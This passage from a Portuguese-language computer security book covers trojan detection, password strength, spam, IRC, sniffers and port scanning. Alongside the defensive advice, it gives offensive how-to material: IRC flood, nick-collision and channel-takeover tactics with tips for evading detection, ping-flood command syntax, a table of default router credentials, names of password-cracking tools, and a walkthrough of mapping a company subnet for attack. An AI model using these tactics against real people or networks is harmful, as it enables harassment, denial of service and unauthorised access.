Aprenda Para Sobreviver

tente o Xô Bo Bus brasileiro ou algum estrangeiro (procure em sites


de pesquisas). Claro que um firewall (como veremos depois) é mais
potente.

1. Abra o programa
2. Clique na pasta Configuração, e coloque a mensagem para a
pessoa que tentar lhe invadir. Se quiser, configure um e-mail
para que a tentativa de invasão seja reportada.
3. Clique na pasta Monitorar.
4. Clique no botão Monitorar. Agora clique com o botão direito no
ícone do superman na barra de tarefas e selecione esconder.
5. Simule uma tentativa de invasão indo a Iniciar / Executar e
digitando:
telnet 127.0.0.1 12345

Pronto você já esta mais seguro

8.10 Remoção do trojan

Detecção por portas

Esse é um método utilizado por programas como o Xôbobus,


Anti-Trojans e muitos outros. Funciona do seguinte modo: os
programadores estudam as portas TCP e UDP utilizadas pelos
trojans e criam um programa que abre essas portas. Assim,
quando um invasor vir à porta aberta e pensar que é um cavalo de
tróia que está instalado ali, cairão em uma armadilha tendo o seu
endereço IP detectado. Esse método não é muito eficiente pois
Terrorismo Tecnológico 187
Aprenda Para Sobreviver

facilmente podemos mudar as portas que os trojans utilizam. Mas


ainda é um método muito usado, pois muitos hackers não se
lembram de trocar as portas.

Detecção pelo arquivo

Esse é o método usado pelos antivírus e o programa The


Cleaner. Ele detecta o trojan checando a sua estrutura. Se o
arquivo estiver renomeado (sem ser para executável) ou estiver
comprimido, esse método se torna inútil. Para ser realmente
eficaz, deve ser usado junto à detecção de portas. Assim, mesmo
que seu antivírus não encontrou um trojan, o Anti-Trojans pode
encontrar.

Detecção por string

Pouco divulgado publicamente se torna a melhor garantia para


se detectar um trojan sem falhas. Mesmo que o programa for
comprimido ou mude suas portas, ele ainda estará usando uma
das 65535 portas do sistema e se comunicará com o cliente. A
comunicação entre cliente e servidor se dá por uma string (texto)
enviada. Por exemplo: O Netbus 1.7 envia uma string assim
“Netbus 1.7x” quando alguma conexão é estabelecida. Se for o
cliente, ele responderá com outra string. Então para analisar todas
as portas do seu sistema e saber quais estão abertas e possuem
strings, utilize um programa como o Chaoscan ou algum outro
scanner de porta que lhe dê essas informações.

Detecção manual
Terrorismo Tecnológico 188
Aprenda Para Sobreviver

Muito eficaz também, a checagem manual do sistema pelo


operador. Olhando registro, arquivos de inicialização, conferindo
os programas carregados na memória, o tamanho dos arquivos,
etc...
Essa política adotada junto aos outros tipos de detecção faz
com que você exclua em 100% a chance de uma invasão por
trojan.
Terrorismo Tecnológico 189
Aprenda Para Sobreviver

Capítulo IX

Senha – Saiba tudo sobre elas!


Terrorismo Tecnológico 190
Aprenda Para Sobreviver

9.1 veja só!

Aqui está uma coisa muito interessante.


Vamos analisar um banco:
Você tem uma senha de quatro dígitos e após digitá-las poderá
acessar a sua conta.
Os números que existem são: 0,1,2,3,4,5,6,7,8,9 isso da o total
de 10 números.
Bom sua senha são de quatro dígitos, então para cada digito
tem-se a opção de 10 números diferentes que você pode usar
então temos:
10 opções no 1º digito, 10 opções no 2º digito, 10 opções no 3º
digito e 10 opções no 4º digito.
Agora é só calcular 10*10*10*10 que é igual a 10.000 senhas
diferentes que são possíveis. Ou se você não puder repetir os
dígitos temos, 10*9*8*7 que é igual a 5040 senhas diferentes.
Se analisarmos veremos que com certeza tem muita gente que
possui a mesma senha que você, pois últimamente o sistema não
deixa repetir os números nas senhas e com certeza há mais de
5040 clientes no banco.
Um programinha que vai testar senha por senha e testando 100
senhas por segundo vai demorar no máximo 100 segundos ou 1
minuto e 40 segundos para descobrir sua senha. Ou no caso das
senhas sem repetir números vai demorar cerca de 51 segundos.
Ta bom ou quer mais?

Os bancos para resolver este problema bloqueiam sua conta


após a terceira tentativa em que a senha é digitada erradamente,
mas em seu computador os seus arquivos, banco de dados, e em
muitas outras aplicações como logon de rede ou ftp não fazem
este bloqueio.
Terrorismo Tecnológico 191
Aprenda Para Sobreviver

Programas para descobrir senhas por tentativas têm de monte


é só dar uma procurada na Internet em sites de busca. Este tipo
de programa é chamado de “descobrir senha por força bruta”.
Acontece que ele possui uma tabela com varias senhas usadas
e vai testando uma por uma até conseguir resultado.

9.2 Senhas dos brasileiros

A maioria usa números de telefones, nomes de times de


futebol, nome do processador da máquina, seu próprio nome ou
da mãe ou do cônjuge, ou números ou letras seguidas como 1234,
1111, 142536, aaaa, qwer,asdf...

Dica: Pense em um nome e em um número, como exemplo o


nome usarei maça e o número 2003, agora vamos intercalar e o
resultado será: m2a0ç0a3, duvido que um hacker por tentativa e
erro vai conseguir descobrir isto. E lembre-se quanto maior for à
senha mais difícil vai ficar.
É só você usar aquele calculo que fizemos agora pouco e você
vai ver.
Se usássemos naquele caso ao invés de uma senha de 4
dígitos uma de 10 teríamos no total uma possibilidade de
10.000.000.000 senhas diferentes.

Muitos administradores usam usuário e senha padrão como


user user, adm administrador... (acho bom começarem a se
preocupar mais com isto)

9.3 Senha - não usar

• Mesmo nome do usuário (login)


Terrorismo Tecnológico 192
Aprenda Para Sobreviver

• Senha em branco
• Palavras óbvias, como "senha", "pass" ou "password"
• Mesma senha para diversos usuários
• Primeiro e último nome do usuário
• Nome da esposa/marido, pais ou filhos
• Informação sobre si mesmo (placa do carro, data de
nascimento, telefone, CPF).
• Somente números
• Palavra contida em dicionário sendo nacional ou
extrangeiro
• Palavra com menos de 6 caracteres

9.4 Troca de senha

• Periodicidade ideal: 3 meses


• Periodicidade máxima: 6 meses
• Sempre que houver suspeita de vazamento
• Sempre que um funcionário que saiba da senha for
despedido

9.5 Quebrando senhas

De Word
Use o programa wfwcd.zip com (19,8k)
De ZIP
Use o programa zipcrack.zip com (12,3k)
DE ARJ
Use o programa brkarj10.zip com (13,1k)
Terrorismo Tecnológico 193
Aprenda Para Sobreviver

9.6 Senhas padrão

Muitos Routers/Switches/Hubs vem com contas e senhas padrão e


estas às vezes são conhecidas pelos invasores deixando a rede à
mercê de qualquer um que tenhas certas informações. A solução
então é mudar todas as senhas padrão.
Vejamos quais são:

Tabela com usernames e senhas principais:


Type/vendor/notes/etc Username Password

3Com admin synnet


3Com read synnet
3Com write synnet
3Com monitor monitor
3Com manager manager
3Com security security
3Com_Office_Connect_5x0_ISDN_Routers n/a PASSWORD
3comCellPlex7000 tech tech
3comCoreBuilder7000/6000/3500/2500 debug synnet
3comCoreBuilder7000/6000/3500/2500 tech tech
3comHiPerARCv4.1.x adm <blank>
3ComLANplex2500 debug synnet
3ComLANplex2500 tech tech
3comLinkSwitch2000/2700 tech tech
3comSuperStackIISwitch 2200 debug
3comSuperStackIISwitch 2700 tech
Terrorismo Tecnológico 194
Aprenda Para Sobreviver

ACC(Ericsson) netman netman


ADC_Kentrox_Pacesetter_Router n/a secret
All_Zyxel_equipment n/a 1234
AT&T_3B2_firmware n/a mcp
AXIS200/240[netcam] root pass
Bay_routers Manager <blank>
Bay_routers User <blank>
Bay350T_Switch n/a NetICs
BaySuperstackII security security
BRASX/I01_(DataCom) n/a letmein
BreezeCOM_adapters2.x(console_only) n/a laflaf
BreezeCOM_adapters3.x(console_only) n/a Master
BreezeCOM_adapters4.x(console_only) n/a Super
Cayman_DSL n/a <blank>
Crystalview_outsideview32 n/a crystal
digiCorp_(viper?) n/a BRIDGE
digiCorp_(viper?) n/a password
DLink_hub/switches D-Link D-Link
Flowpoint_DSL_installed_by_Covad n/a password
Flowpoint_DSL2000 admin admin
Jetform_design Jetform n/a
Lantronics_Terminal_server_port 7000 n/a
Lantronics_Terminal_server_port 7000 n/a
Linksys_DSL n/a admin
Livingston_IRX_router !root <blank>
Livingston_officerouter !root <blank>
Livingston_portmaster2/3 !root <blank>
Microplex_print_server root root
Terrorismo Tecnológico 195
Aprenda Para Sobreviver

Motorola-Cablerouter cablecom router


Netopia_7100 <blank> <blank>
Netopia_9500 netopia netopia
Orbitor_console n/a password
Orbitor_console n/a BRIDGE
Osicom(Datacom) sysadm sysadm
Shiva root <blank>
Shiva Guest <blank>
SpeedstreamDSL(Efficient) n/a admin
UClinux_for_UCsimm root uClinux
Webramp wradmin trancell
Alteon ACEswitch 180e (web) admin admin
Alteon ACEswitch 180e (telnet) admin <blank>
NETPrint (all) n/a sysadm
Xylan Omniswitch admin switch
Xylan Omniswitch diag switch
AcceleratedDSL CPE and DSLAM sysadm anicust
Arrowpoint admin system
Cabletron (routers & switches) <blank> <blank>
Adtran MX2800 n/a adtran
Raidzone raid arrays n/a raidzone
CableTron Netgear modem/router and SSR netman <blank>
Ascend Pipeline/MAX user n/a
Compaq Netelligent n/a superuser
Develon Orbitor n/a bridge
shiva VPN Gateway n/a shiva/isolation
Dlink ISDN routers n/a 1234
Terrorismo Tecnológico 196
Aprenda Para Sobreviver

Needed

SMC
Accton

Contributed by:

Stephen Friedl <friedl@mtndew.com>


Sebastian Andersson
<bofh@diegeekdie.com>
Jonathan Leto <jonathan@leto.net>
mat@ivntech.com
Mike Blomgren
<mike.blomgren@knowit.se>
Knud Erik Højgaard <knud@cybercity.dk>
mobileunit@mobileunit.org
Roelof Temmingh
<roelof@sensepost.com>
Axel Dunkel <ad@Dunkel.de>
Mathias Bogaert" <pathos@pandora.be>
extracts from "Hacking Exposed"
Jonathan Leto <jonathan@leto.net>
Chris Owen <chris@totalconnect.com>
Jim Wildman <jim@rossberry.com>
Santiago Zapata
<szapata@creatos.com.mx>
Brian S. DuRoss <briand@cac.net>
Eric Knight <deceased1@HOME.COM>
Max Vision vision@whitehats.com
Terrorismo Tecnológico 197
Aprenda Para Sobreviver

Lou Albano mistert@dslnet.com


Mike Ireton mike@bayoffice.net
bacano bacano@esoterica.pt
Karl Greenwood Karl@pt-services.co.uk

Last Updated on Wed Jul 12 00:42:05 SAST 2000


By Roelof Temmingh
Email: roelof@sensepost.com
I put the stuff on here just the way I receive it..its not verified!
Lembre-se
Arquivos, programas, vírus, trojans, podem ser escondidos
arquivos dentro de fotos como em arquivos.gif como é o caso em
que o programa Hide and Seek v. 4.1 pode mesclar os dois
arquivos. E um programa espião pode ser instalado para copiar as
suas senhas.
Terrorismo Tecnológico 198
Aprenda Para Sobreviver

Capítulo X

Spam – A praga
Terrorismo Tecnológico 199
Aprenda Para Sobreviver

10.1 Spam – A praga no e-mail

Calma, não é um novo tipo de vírus, Spam na verdade são


mensagens mandadas em série, isto é são aqueles e-mails que o
pentelho de um amigo seu fica te repassando, como piadas,
mensagens, textos... Em 2003 estimasse que 70% do trafego de
e-mail seja spam e a previsão é que aumente cada vez mais.

Há também sites que após um cadastro, ficam mandando


noticias, previsões de tempo, anúncios de compra e venda entre
outros. Até parece interessante durante alguns dias, mas logo
você não vai mais ter interesse e só servirá para lotar sua caixa de
e-mails.

O problema é bem mais grave do que se pensa, já que junto ao


e-mail poderá vir um vírus ou um trojan. Uma vez aberto este e-
mail o computador estará infectado. Então desde já instale um
bom antivírus que proteja não só a máquina, mas que também
cheque todos os e-mails recebidos e enviados.

Para parar de receber as correspondências de Spam, você


pode bloquear os e-mails, estes podem ser a partir de
determinados conteúdos ou de um determinado usuário. Para
bloquear você pode utilizar uma opção no Outlook ou no software
que você utiliza para ver as suas correspondências (geralmente
todos softwares de e-mail possuem está função). Ou então pela
própria página prestadora de serviços de e-mail como o BOL,
Globo.com, Hotmail, UOL etc.

10.2 E-Mail Bomba


Terrorismo Tecnológico 200
Aprenda Para Sobreviver

Às vezes até serviços de Spam são utilizados para este: o e-


mail bomba consiste no envio de muitos e-mails em um tempo
muito rápido, (ou pode ser um e-mail que se reproduz
automaticamente), assim quando o usuário o abrir ele irá se
multiplicar, a memória do computador provavelmente vai ficar
superlotada e a máquina vai travar.

Não há muito que fazer neste caso a não ser usar o antivírus
para a proteção, e se o sistema travar só resta mesmo reiniciá-lo e
após isso tentar apagar este e-mail.
Terrorismo Tecnológico 201
Aprenda Para Sobreviver

Capítulo XI

IRC – Não pense que não é importante aprender sobre Chats,


pois na verdade é muito importante, já que muitos usuários os
usam escondido e o tempo todo!
Terrorismo Tecnológico 202
Aprenda Para Sobreviver

11.1 Introdução

Neste momento é claro que você está se perguntando, o que


tem a ver o IRC, com segurança para aeronáutica, bancos, sua
empresa... e até na sua casa!
Simples, muitos usuários acabam que ao invés de trabalhar
ficam teclando, ou o Administrador ao invés de cuidar da rede fica
papeando em salas de Chat. Então estou disponibilizando um
manual do IRC. Para que vocês possam saber o que é possível
fazer com este serviço.

11.2 Flood

Essa é uma antiga, elegante e efetiva maneira de paz com que


a vítima mande muita informação para um servidor, que a
desconecta. Para tal são necessários clones. Clones são outras
conexões com o servidor. Cópias do seu IRC client. O flood script,
manda os clones enviarem muita informação simultaneamente
para a pessoa. Quando o IRC client dele tenta processar essa
informação, manda muitos dados para o servidor, que então vai
desconectá-lo.

Existem muitos tipos de floods, mas escolher o melhor


provavelmente trará um resultado mais rápido como os DCC e
CTCP. Já os: Text, Notice, Invite floods, Crap floods não
funcionam mesmo, ele te mostra à informação que derrubou o
cliente, mas na verdade não fez foi nada. Outro fator importante é
números de clones que você vai usar. Para dar flood em uma
única pessoa, a melhor aposta que você pode fazer são três
clones CTCP em floods como Clientinfo, Userinfo ou Version.
ECHO floods são extremamente poderosos, porém requerem mais
clones. DCC floods são muito efetivos também. Existem 4 tipos de
DCC flood diferentes. São eles: DCC Chat flood, que manda
Terrorismo Tecnológico 203
Aprenda Para Sobreviver

milhares de janelas de DCC chat para a pessoa; DCC send flood,


manda milhares de DCC send (Se os DCCs forem aceitos
automaticamente pode-se encher o HD de arquivos desagradáveis
ou até fazer o micro travar já que a memória do computador vai
lotar. DCC Resume e Accept são outros dois tipos. Esses últimos
foram a melhor forma de flood encontrada, mas IRC clients não os
suportam mais, tornando eles fúteis.
Quando usar clones ou fazer floods deve-se ter cuidado para
não ser pego. Isso acarretaria em um K-line. Para prevenir que
isso aconteça, lembre: Não use clones se não for absolutamente
necessário. Destrua seus clones quando o objetivo for alcançado!
Use "nick changing" clones pra dar flood. Todos sabem sobre o
/whois para ver informações da pessoa, mas a maioria não sabe
sobre o /whowas. Assim, se o clone mudar de nome depois do
flood, a vítima nunca vai saber quem o fez. NUNCA dê floods em
canais com IRCops ou Network admins! Isso, certamente, vai lhe
custará um K-line. Se for possível, faça o flood junto de um amigo,
quanto menos clones por IP menor a chance de você ser pego.

Lembre-se que quanto mais rápida for sua conexão melhores


resultados você terá, então é muito difícil derrubar alguém se esta
conectado por linha discada e a vítima estiver por uma conexão de
banda larga. E muitos usuários atacando uma única vítima
também conseguira melhores resultados.

11.3 Colisão de Nicks

A colisão de Nicks ocorre quando duas pessoas estão usando


o mesmo nick. Como os servidores não podem suportar isso, as
pessoas são desconectadas. Existem dois tipos de colisão de
Nicks. A colisão por split server e a por lag. A por split Server
acontece quando você põe um bot dentro do splited Server, com o
nick da pessoa que você quer matar. No netmerge, as duas
morrem. Esse método não funciona na undernet. O outro método é
Terrorismo Tecnológico 204
Aprenda Para Sobreviver

chamado de colisão por lag. Esse só pode ser feito quando a


pessoa muda de nick. O que acontece é isso: Primeiro lammer
muda de nick. Segundo o script vê e manda um sinal para o bot
que está no servidor laged e esse muda o seu nick para o novo
nick da vítima. Terceiro em uns poucos segundos de lag o
servidor em que o bot está dá um kill na outra pessoa, porque
acha que o seu bot pegou o nick primeiro. Esse não é um bom
método para um takeover, mas é divertido ver um bando de gente
recebendo kill num grande canal.

11.4 Tomando Canais

Tomar canais é uma boa maneira de mostrar seu poder ou se


vingar de um inimigo. É o motivo básico das guerras de IRC,
controle de território. Essa seção contém informações úteis para
fazê-lo de várias maneiras.

11.5 Flood no Canal

Esse método é divertido, mas a parte mais difícil é que cada


vez mais pessoas estão ficando imunes ao flood. Conseguindo dar
flood em todas as pessoas o resto é fácil. Pegue todos os clones
que você usou e descarte-os. Depois entre no canal e pegue OP.
Contudo se seu não cair temos um dilema. Um canal sem OP e
com duas pessoas o querendo. O que você faz? Corra para um
netsplit!
Terrorismo Tecnológico 205
Aprenda Para Sobreviver

11.6 Netsplit

Um canal sem OP é um alvo fácil para um netsplit. O que você


faz é o seguinte: Quando achar um servidor splited conecte-se a
ele. Se não houver ninguém no canal você ganha OP só entrando
no canal. Com o OP, basta esperar por um netmerge e quando
todos estiverem no canal novamente você vai ser o único OP,
podendo fazer o que quiser!
Fazer isso com um canal que já tem OPs não é fácil. Na
Undernet é impossível. Mas isso não quer dizer que você não
possa se divertir. Pegue o OP e espere um netmerge. Quando as
pessoas voltarem ao canal, rode um desync. O que ele faz, é
mudar as banlists, as esvazie e mude os modos do canal. Isso
realmente acaba com os servidores que já estão mal. Eles ficam
tentando colocar o canal nos modos normais, isso causa um lag
terrível que leva o canal à ruína. Isso acaba também com os bots
que não estão splited. Isso pode causá-los flood ou crash. Se você
não pode hackear os OPs pelo menos tem a sua vingança. Essa
brincadeira pode levar o canal a ficar mal por uma meia hora
algumas vezes.
Se você é sortudo o suficiente para estar numa rede lammer
que ainda não tem proteção anti-nethack, você poderá tomar
canais com netsplit, bastando ter o script certo. Primeiro - você
precisa de um servidor splitado sem proteção. O que acontece é
que quando o servidor quiser dar OP para alguém ele vai, na
verdade, deOPar essa pessoa. Segundo - outro boa maneira de
fazer isso é tendo como dar um kickban em cada pessoa que
entrar no canal por um netmerge. Isso combinado com o netsplit
protection fará você tomar o canal depois de uma simples batalha.
Terrorismo Tecnológico 206
Aprenda Para Sobreviver

11.7 Pedindo ao OP

Essa é a maneira mais fácil de tomar um canal. É efetiva e


legal, os significa te darem OP e você deOPar todos eles. Os
IRCops não podem fazer nada contra isso. A melhor maneira de
ganhar OP é ficar num canal um pouco, sendo amável e prestativo
depois peça para se ele pode te OPar? Diga que já entra no canal
faz tempo e quer ajudar manter a ordem... Depois o script cuida de
deOpar todos em massa, isso é fácil. O que o script vai fazer é
óbvio: logo quando você ganhar o OP ele vai tirar o OP de todos
os outros, com exceção de você. Eles nem vão ter tempo de
reagir! Depois de estar sozinho como OP do canal você poderá
fazer o que quiser, trancar o canal, kickar e/ou banir todo mundo,
tudo que der na telha. O canal é seu agora!

11.8 Guerra Avançada

Os scripts de guerra estão ficando cada vez mais avançados.


Contudo, os servidores e os IRCops também estão ficando cada
vez melhores. Muitos servidores incorporam o Clone Detection.
Isso significa listar as pessoas comparando os IP's e notificando os
IRCops. Isso pode tornar impossível fazer um número de clones
suficientes para dar um flood em alguém. Alguns servidores têm
proteção contra táticas de netsplit takeover. Esse tipo de coisa
pode deter o hacking contra OPs durante um netsplit, permitindo
somente tomar canais que não tenham OP. Anti Collide é também
usado em muitos servidores. Fazendo com que os dois usuários
sejam mortos numa colisão por troca de nick.
Terrorismo Tecnológico 207
Aprenda Para Sobreviver

11.9 Nuke

Nuke é uma grande arma para tirar alguém de IRC rápido!


Funciona assim: O programa de nuke manda informação para
pessoa no servidor e ela é ferrada por eles, causará erros como
"dead Socket", "connection refused", "eof from client" e "machine is
not on the network".
Para usar o nuke é preciso primeiro um modem rápido 28.8, ou
melhor. Você também precisa do Trumpet© Winsock. Programa
dial up que se comunica rapidamente com o modem. Esse
programa pode ser facilmente encontrado na web. Agora só é
preciso de um programa de Nuke. Eu recomendo o Winuke 4 by
CHAOS INC. ou Wnewk para máquinas Windows, ou se você usa
um mac, MAC NUKE. Depois de pegar esses programas, é fácil
tomar canais, e matar nicks rapidamente.

11.10 Bombas ICMP

ICMP é uma maneira extremamente poderosa de tirar a


pessoa, não só de IRC, mas de sua conexão com a Internet.
Funciona dessa maneira: ela manda mensagens ICMP, em uma
taxa muito alta de velocidade, causando barulho na linha, e
modem lag. Causa tanto lag, que seu ping aumenta terrivelmente
e o joga pra fora do IRC server.
Para usar o ICMP você precisa de um Unix Shell account. Por
que? Porque para usar o ICMP efetivamente você precisa de mais
do que um modem pode oferecer. Você precisa de uma T1, pelo
menos. Existem muitos programas de ICMP para Windows
disponíveis, mas eles não trabalham muito bem. É a velocidade
que importa nessa hora.
Aqui estão duas formas de usar ICMP num Unix shell:
Ping -s (ip address) (packet size) (# of packets)
Terrorismo Tecnológico 208
Aprenda Para Sobreviver

Ping -s (packet size) -c (# of packets) <-f>


(ip address) (IP address) é o *!*@seja.la.oque.for (packet size)
é o tamanho de cada pacote a mandar, tente 30kb (# of packets) é
quantos pacotes mandar 3000 é um bom número -f é opcional em
segundo, e manda pacotes a 20/seg.

11.11 Botnet/Floodnet

É cada vez mais difícil usar clones sem ser pego. Você precisa
de uma maneira de usar o flood sem ser detectado. Como fazer
isso? Floodnet. Existem dois tipos diferentes de Floodnet. O
primeiro é com Eggdrop bots, esses botnets são compreendidos
como eggdrops ligados, e tem um script de flood comum. Existem
botnets com muitas centenas de ligações. É muito difícil parar o
flood deles. A outra maneira, é usar scripts individuais. Os scripts
têm comandos comuns, e permitem que usuários com o mesmo
script de se liguem, para juntos combinarem seus clones. Existem
vantagens e desvantagens dos dois. As vantagens dos botnets é
que estão sempre online porque estão em um Shell. Mas as
desvantagens é que não são tão dinâmicos quanto uns clones
floodnet.
Terrorismo Tecnológico 209
Aprenda Para Sobreviver

Capítulo XII

Sniffers – Os farejadores da Net


Terrorismo Tecnológico 210
Aprenda Para Sobreviver

12.1 Introdução

Os sniffers (farejadores), funcionam mais ou menos como um


cão farejador que fica espionando todas as informações que
passam por ele. Podendo fazer parte de um Trojan (cavalo de tróia).
Depois de instalado um Sniffer captura tudo o que trafega pela rede
e o que é feito localmente (no computador onde ele reside). Na
verdade ele não passa de um espião, copiando tudo o que passa
por ali sendo o que entra por dispositivos de input, ou seja, o
teclado, e algumas versões copiam as informações transmitidas
pelos protocolos, podendo então capturar conversas, textos,
mensagens e qualquer outra coisa que esteja trafegando pela rede.
Nada que seja entrada e saída de dados escapará ileso, ele abre os
pacotes e os salva como um texto podendo ser lido depois como um
documento.txt. Copia mesmo sendo em um servidor de ftp, chats,
aplicativos, editores de texto, enfim tudo o que for feito vai sendo
salvo. Existem sniffers para Unix, Linus, Windows... enfim para
todas as plataformas.

Na pratica.
Terrorismo Tecnológico 211
Aprenda Para Sobreviver

(Sniffer IRIS versão 3.6)

12.2 Filtrando pacotes na rede

É claro que para capturar os pacotes da rede o sniffer tem que


ter acesso a eles. Em uma rede ponto a ponto, onde não se tem um
servidor todos recebem os protocolos em qualquer máquina o
programa ira pegar as informações, porém em uma rede com
servidor e sub-redes não. Em uma super rede o sniffer para capturar
os pacotes tem que estar instalado no servidor, obrigando o hacker
a invadir o servidor e instalar o programa lá dentro. No caso da
Internet, o sniffer teria que ser instalado na máquina do provedor e
somente irá capturar as informações de quem estiver conectado por
este provedor. Geralmente em provedores a idéia é capturar logins
e senhas para conexão e informações sobre os usuários. Mas em
Terrorismo Tecnológico 212
Aprenda Para Sobreviver

empresas pode-se pegar informações, documentos, e tudo mais que


estiver trafegando pela rede, ou localmente no caso de estar
instalado para pegar somente o que se passa pela máquina.
É bem perigoso, pois em um banco poderia copiar todas as
informações de um cliente inclusive sobre sua conta e a senha.

12.3 Capturando senhas

Existem algumas opções no Sniffer que possibilita filtrar os tipos


de pacotes a serem salvos. Vamos supor que queira descobrir todas
as senhas que comecem com a letra “M”. Após configurar o sniffer e
esperar, ele começa a me enviar os pacotes recebidos já
“selecionados” começando com a letra “M”, estes podem ser
enviados para você via e-mail. Existem muitos desses spys pela
Internet que podem ser pegos gratuitamente, e tem muitos
administradores, chefes ou até um “amigo” que instalam esses
aplicativos para vigiar os seus funcionários e conhecidos, e em
alguns casos até os expondo ao ridículo já que assim poderão ler
seus e-mails e até dizer para alguém que tipo de mensagem você
vê.

12.4 Roteadores

Alguns sniffers conseguem obter dados direto do roteador. O que


quer dizer que no modelo OSI ele consegue ler as informações
contidas na camada 3. Então mesmo que seja instalada uma
proteção no sistema operacional, como um anti-sniffer ou um
antivírus que possua uma boa proteção não adiantaria de nada se o
sniffer estiver pegando os dados diretamente roteadores. Este que
ao rotear as informações geram uma copia e as envia ao espião.
Terrorismo Tecnológico 213
Aprenda Para Sobreviver

Para se defender disto somente se o administrador tiver a


consciência de não deixar o roteador mofando e aplicar as
correções necessárias para atualizar o próprio roteador. O ideal
seria procurar a página do fabricante e verificar se existe alguma
dica ou informação sobre o assunto. E Torcer para que o Fabricante
se preocupe com isto! Por isso na hora de comprar um root tome
cuidado. Já dizia minha avó que o barato sai caro!

12.5 Anti-Sniffers

São programas que ficam monitorando para ver se ninguém esta


copiando suas informações e retransmitindo para alguém.
Há bons e péssimos anti-sniffers, uns não conseguem monitorar
direitos e outros acabam deixando o seu sistema lento.
Os melhores são os que enganam o invasor, ele envia vários
conteúdos falsos para o hacker e este vai imaginando que está
obtendo sucesso, quando na verdade esta só recebendo
informações erradas.
Uma boa idéia é usar um Honeypot com um anti-sniffer.

(Bons Sniffers)

• DNMENG
• ICMP DATA SNIFFER
• LANGUARD
• SHOMITI
• IRIS (provavelmente o melhor!)
Terrorismo Tecnológico 214
Aprenda Para Sobreviver

Capítulo XIII

Scanners - Verdadeiros Robôs em busca de brechas!


Terrorismo Tecnológico 215
Aprenda Para Sobreviver

13.1 Introdução

Todos aplicativos que são lançados para a venda, de qualquer


empresa, chega ao usuário com muitos Bugs. Esses podem vir a ser
uma ameaça à segurança se não forem localizados e corrigidos.
Então para analisar e testar todos os aplicativos e o próprio sistema
operacional é que se tem o scanner, ele procura erros. Muitos
hackers também o utilizam, pois assim ficam sabendo onde o
sistema está vulnerável, ficando assim facilmente exposto a
ataques.

13.2 Falhas em um host

Usamos então o scanner para detectar as falhas, ele testará


cada porta e seu serviço em busca de erros do aplicativo ou erros
que o administrador cometeu ao configurá-lo.
Tentando proteger o seu sistema, atualmente usa-se um firewall,
este apenas deixa habilitada determinada porta do computador,
bloqueando as outras para que não seja atacado, porém o ataque
pode ser feito pela torta que ficou aberta e que esta sendo usada
pelo sistema, como a porta 80 (www).
Servidores World Wide Web, são os que guardam as home
pages para que qualquer um com um computador possa acessá-las,
mas esses servidores possuem inúmeras falhas que podem ser
usadas para invadir, podendo então tirar o site do ar, ou mesmo
desarrumá-lo mudando sua estrutura, as informações contidas...
Internet Information Server e o Apache, por serem os mais
conhecidos são também um dos que mais possuem falhas
conhecidas como a de deixar o invasor entrar na rede ou gerar um
Buffer Overflow que faz com que a memória do servidor seja toda
consumida, travando o sistema.
Terrorismo Tecnológico 216
Aprenda Para Sobreviver

Mas não é só a www, são todas as portas e serviços que


possuem os erros.

13.3 Portas e Serviços Ativos

O total de portas em um computador é de 65535, sendo elas


TCP e UDP. Cada uma executa um determinado serviço, uns
exemplos são:

Nº da porta – Serviços:

21 - FTP (File Transfer Protocol)


23 - TELNET
25 - SMTP (Simple Mail Transfer Protocol)
79 - FINGER
80 - WWW

Qualquer que seja a aplicação que iremos utilizar, quando


fizemos algo em uma rede ou na Internet usamos uma porta. Sendo
algumas delas que sempre mudam de serviço como a do ICQ ele
pega uma porta que não está sendo utilizada e a usa na próxima
vez que você conectar na Internet ele pegará outra porta disponível,
estas são as portas randômicas, isto é elas não executam
necessariamente a mesma aplicação sempre.
Um scanner de Portas faz o trabalho de verificar quais dessas
estão ativas, um bom scan é o Haktek e o Shadow Scan. Testará as
65535 uma por uma e retornará mostrando qual porta e serviço
estão sendo utilizados.
Terrorismo Tecnológico 217
Aprenda Para Sobreviver

Podemos até mesmo passar o scan na nossa rede ou no nosso


computador para saber quais portas estão abertas, e digamos que
ele nos informe que: 80 e a 12345 estão ativas.
A 80 é a de www
A 12345 é a do Net Bus

EPA! Netbus é um trojan, isto quer dizer que ele esta instalado e
ativo. Pronto agora sabemos que a rede está infectada.
E é assim mesmo que um invasor faz, vai scanneando pela
Internet até achar alguém que já esteja contaminado.

13.4 Máquinas ativas da subnet

Um servidor possivelmente possui algumas sub-redes, essas são


pequenas redes que compartilham o mesmo servidor. Novamente
os Shadow Scan, o Haktek lideram sendo os melhores para
descobrir quem são essas máquinas. Ele descobre então quais são
os hosts ativos e o seu DNS (nome).

Digamos que um hacker queira os hosts da empresa ATACADA


(não sei se essa empresa existe só peguei um nome como exemplo)
Primeiro é só abrir uma janela do DOS e digitar ping mais o
endereço.
Terrorismo Tecnológico 218
Aprenda Para Sobreviver

Após dar enter ele retorna mostrando que o IP é 200.200.200.200

Agora com o scanner coloca-se o IP e pede para que ele localize


os hosts.

E nos retorna que:


200.200.200.125 - internet.atacada.com.br
200.200.200.30 - campus.atacada.com.br
200.200.200.15 - route.atacada.com.br
200.200.200.09 - diretor.atacada.com.br
200.200.200.54 - server.atacada.com.br
200.200.200.79 - fabio.atacada.com.br
200.200.200.189 - email.atacada.com.br
200.200.200.55 - ftp.atacada.com.br
Terrorismo Tecnológico 219
Aprenda Para Sobreviver

Digamos que anteriormente o hacker não havia conseguido


invadir o servidor, pois este estava bem protegido, mas agora ele
pode atacar uma sub máquina e pegar as informações!
Ou até mesmo instalar um sniffer no roteador já que agora ele
sabe que este está na 200.200.200.15 - route.atacada.com.br
Ou instalar um sniffer em uma máquina qualquer e começar a
recolher dados que estão passando pela rede.

13.5 Scanneando o netbios

O netbios não é um protocolo roteavel. E a função dele é de


prover a comunicação de uma rede. Como não da para rotea-lo,
necessariamente todas as máquinas ligadas por ele tem que estar
na mesma sub rede. Se scanneado e invadido será possível mapear
drives de todos os outros micros ligados a ele.

13.6 Como Evitar então?

O bom mesmo é não usar o netbios, mas se precisar faça o


seguinte:

- Se o computador não pertencer a nenhuma rede ou não


precisar compartilhar arquivos pela Internet, desabilite as opções
“Compartilhar arquivos e impressoras”

- Coloque senhas para acesso.


- Corrija todos os Bugs do sistema.
- Se usar Linux e Windows cuidado com o Samba
Terrorismo Tecnológico 220
Aprenda Para Sobreviver

E por fim passe um bom scanner como o NAT (Netbios Auditing


Tool) para ver se ainda possui alguma falha.

13.7 HTTP e FTP

Tanto quanto o HTTP e FTP podem ser scanneados por um


scan de vulnerabilidade, este pode encontrar erros em sistemas e
ainda vir com um guia ensinando como utilizar as falhas
encontradas. Alguns scanners podem descobrir os hosts ativos,
